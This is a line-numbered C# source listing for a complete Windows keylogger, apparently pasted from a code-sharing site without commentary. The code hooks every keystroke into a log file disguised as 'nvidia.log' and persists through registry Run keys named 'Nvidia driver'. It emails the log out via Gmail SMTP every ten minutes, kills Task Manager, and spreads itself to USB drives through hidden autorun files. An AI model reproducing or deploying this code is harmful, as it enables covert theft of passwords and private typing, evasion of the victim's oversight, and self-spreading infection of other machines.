private const int WH_KEYBOARD_LL = 13; private const int WM_KEYDOWN =

1. private const int WH_KEYBOARD_LL = 13;
2. private const int WM_KEYDOWN = 0x0100;
3. private static LowLevelKeyboardProc _proc = HookCallback;
4. private static IntPtr _hookID = IntPtr.Zero;
5. public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
6. public static byte caps = 0, shift = 0, failed = 0;
7.  
8. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
9. private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
10.  
11. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
12. [return: MarshalAs(UnmanagedType.Bool)]
13. private static extern bool UnhookWindowsHookEx(IntPtr hhk);
14.  
15. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
16. private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
17.  
18. [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
19. private static extern IntPtr GetModuleHandle(string lpModuleName);
20.  
21. public static void Main()
22. {
23. _hookID = SetHook(_proc);
24. Program.startup();
25. System.Timers.Timer timer;
26. timer = new System.Timers.Timer();
27. timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
28. timer.AutoReset = true;
29. timer.Interval = 600000;
30. timer.Start();
31. System.Timers.Timer timer2;
32. timer2 = new System.Timers.Timer();
33. timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
34. timer2.AutoReset = true;
35. timer2.Interval = 10000;
36. timer2.Start();
37. Application.Run();
38. GC.KeepAlive(timer);
39. GC.KeepAlive(timer2);
40. UnhookWindowsHookEx(_hookID);
41. }
42.  
43. public static void startup()
44. {
45. //Try to copy keylogger in some folders
46. string source = Application.ExecutablePath.ToString();
47. string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
48. destination=System.IO.Path.Combine(destination,"nvdisp.exe");
49. try
50. {
51. System.IO.File.Copy(source, destination,false);
52. source = destination;
53. } catch {
54. Console.WriteLine("No authorization to copy file or other error.");
55. }
56. //Find if the file already exist in startup
57. try
58. {
59. RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
60.  
61. if (registryKey.GetValue("Nvidia driver") == null)
62. {
63. registryKey.SetValue("Nvidia driver", destination);
64. }
65.  
66. registryKey.Close();//dispose of the Key
67. } catch {
68. Console.WriteLine("Error setting startup reg key.");
69. }
70. //Try to add to all users
71. try
72. {
73. RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
74.  
75. if (registryKey.GetValue("Nvidia driver") == null)
76. {
77. registryKey.SetValue("Nvidia driver", source);
78. }
79.  
80. registryKey.Close();//dispose of the key
81. }
82. catch
83. {
84. Console.WriteLine("Error setting startup reg key for all users.");
85. }
86. }
87.  
88. public static void OnTimedEvent(object source, EventArgs e)
89. {
90. Process[] ProcessList = Process.GetProcesses();
91. foreach (Process proc in ProcessList)
92. {
93. if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
94. {
95. proc.Kill();
96. }
97. }
98. System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
99. msg.To.Add("username@gmail.com");
100. msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
101. msg.Subject = "i don't know";
102. msg.SubjectEncoding = System.Text.Encoding.UTF8;
103. msg.Body = "ciao ale";
104. msg.BodyEncoding = System.Text.Encoding.UTF8;
105. msg.IsBodyHtml = false;
106. msg.Priority = MailPriority.High;
107. SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
108. client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
109. client.Port = 587;
110. client.Host = "smtp.gmail.com";
111. client.EnableSsl = true;
112. Attachment data = new Attachment(Program.path);
113. msg.Attachments.Add(data);
114. try
115. {
116. client.Send(msg);
117. failed = 0;
118. }
119. catch
120. {
121. data.Dispose();
122. failed = 1;
123. }
124. data.Dispose();
125.  
126. if (failed == 0)
127. File.WriteAllText(Program.path, ""); //empties the file
128.  
129. failed = 0;
130.  
131. }
132.  
133. private static IntPtr SetHook(LowLevelKeyboardProc proc)
134. {
135. using (Process curProcess = Process.GetCurrentProcess())
136. using (ProcessModule curModule = curProcess.MainModule)
137. {
138. return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
139. }
140. }
141. private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
142. private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
143. {
144. if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
145. {
146. StreamWriter sw = File.AppendText(Program.path);
147. int vkCode = Marshal.ReadInt32(lParam);
148. if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
149.  
150. switch ((Keys)vkCode)
151. {
152. case Keys.Space:
153. sw.Write(" ");
154. break;
155. case Keys.Return:
156. sw.WriteLine("");
157. break;
158. case Keys.Back:
159. sw.Write("back");
160. break;
161. case Keys.Tab:
162. sw.Write("TAB");
163. break;
164. case Keys.D0:
165. if (Program.shift == 0) sw.Write("0");
166. else sw.Write(")");
167. break;
168. case Keys.D1:
169. if (Program.shift == 0) sw.Write("1");
170. else sw.Write("!");
171. break;
172. case Keys.D2:
173. if (Program.shift == 0) sw.Write("2");
174. else sw.Write("@");
175. break;
176. case Keys.D3:
177. if (Program.shift == 0) sw.Write("3");
178. else sw.Write("#");
179. break;
180. case Keys.D4:
181. if (Program.shift == 0) sw.Write("4");
182. else sw.Write("$");
183. break;
184. case Keys.D5:
185. if (Program.shift == 0) sw.Write("5");
186. else sw.Write("%");
187. break;
188. case Keys.D6:
189. if (Program.shift == 0) sw.Write("6");
190. else sw.Write("^");
191. break;
192. case Keys.D7:
193. if (Program.shift == 0) sw.Write("7");
194. else sw.Write("&");
195. break;
196. case Keys.D8:
197. if (Program.shift == 0) sw.Write("8");
198. else sw.Write("*");
199. break;
200. case Keys.D9:
201. if (Program.shift == 0) sw.Write("9");
202. else sw.Write("(");
203. break;
204. case Keys.LShiftKey:
205. case Keys.RShiftKey:
206. case Keys.LControlKey:
207. case Keys.RControlKey:
208. case Keys.LMenu:
209. case Keys.RMenu:
210. case Keys.LWin:
211. case Keys.RWin:
212. case Keys.Apps:
213. sw.Write("");
214. break;
215. case Keys.OemQuestion:
216. if (Program.shift == 0) sw.Write("/");
217. else sw.Write("?");
218. break;
219. case Keys.OemOpenBrackets:
220. if (Program.shift == 0) sw.Write("[");
221. else sw.Write("{");
222. break;
223. case Keys.OemCloseBrackets:
224. if (Program.shift == 0) sw.Write("]");
225. else sw.Write("}");
226. break;
227. case Keys.Oem1:
228. if (Program.shift == 0) sw.Write(";");
229. else sw.Write(":");
230. break;
231. case Keys.Oem7:
232. if (Program.shift == 0) sw.Write("'");
233. else sw.Write('"');
234. break;
235. case Keys.Oemcomma:
236. if (Program.shift == 0) sw.Write(",");
237. else sw.Write("<");
238. break;
239. case Keys.OemPeriod:
240. if (Program.shift == 0) sw.Write(".");
241. else sw.Write(">");
242. break;
243. case Keys.OemMinus:
244. if (Program.shift == 0) sw.Write("-");
245. else sw.Write("_");
246. break;
247. case Keys.Oemplus:
248. if (Program.shift == 0) sw.Write("=");
249. else sw.Write("+");
250. break;
251. case Keys.Oemtilde:
252. if (Program.shift == 0) sw.Write("`");
253. else sw.Write("~");
254. break;
255. case Keys.Oem5:
256. sw.Write("|");
257. break;
258. case Keys.Capital:
259. if (Program.caps == 0) Program.caps = 1;
260. else Program.caps = 0;
261. break;
262. default:
263. if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
264. if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
265. if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
266. if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
267. break;
268. }
269. Program.shift = 0;
270. sw.Close();
271. }
272. return CallNextHookEx(_hookID, nCode, wParam, lParam);
273. }
274.  
275. public static void USBSpread(object source, EventArgs e)
276. {
277. ///////////////////////////////////////////////////////////////
278. /////////////////////// USB spread class //////////////////////
279. ///////////////////////////////////////////////////////////////
280. //A bit modified
281. string source2 = Application.ExecutablePath.ToString();
282. System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
283. try
284. {
285. foreach (System.IO.DriveInfo drive in drives)
286. {
287. if (drive.DriveType == DriveType.Removable)
288. {
289. string driveAutorun = drive.Name + "autorun.inf";
290. StreamWriter sw = new StreamWriter(driveAutorun);
291. sw.WriteLine("[autorun]\n");
292. sw.WriteLine("open=start.exe");
293. sw.WriteLine("action=Run VMCLite");
294. sw.Close();
295. File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
296. try
297. {
298. File.Copy(source2, drive.Name + "start.exe", true);
299. File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
300. }
301. finally
302. {
303. Console.WriteLine("Removable device rooted");
304. }
305. }
306. }
307. }
308. catch (Exception e2)
309. {
310. Console.WriteLine(e2.ToString());
311. }
312. }
313. }
314. }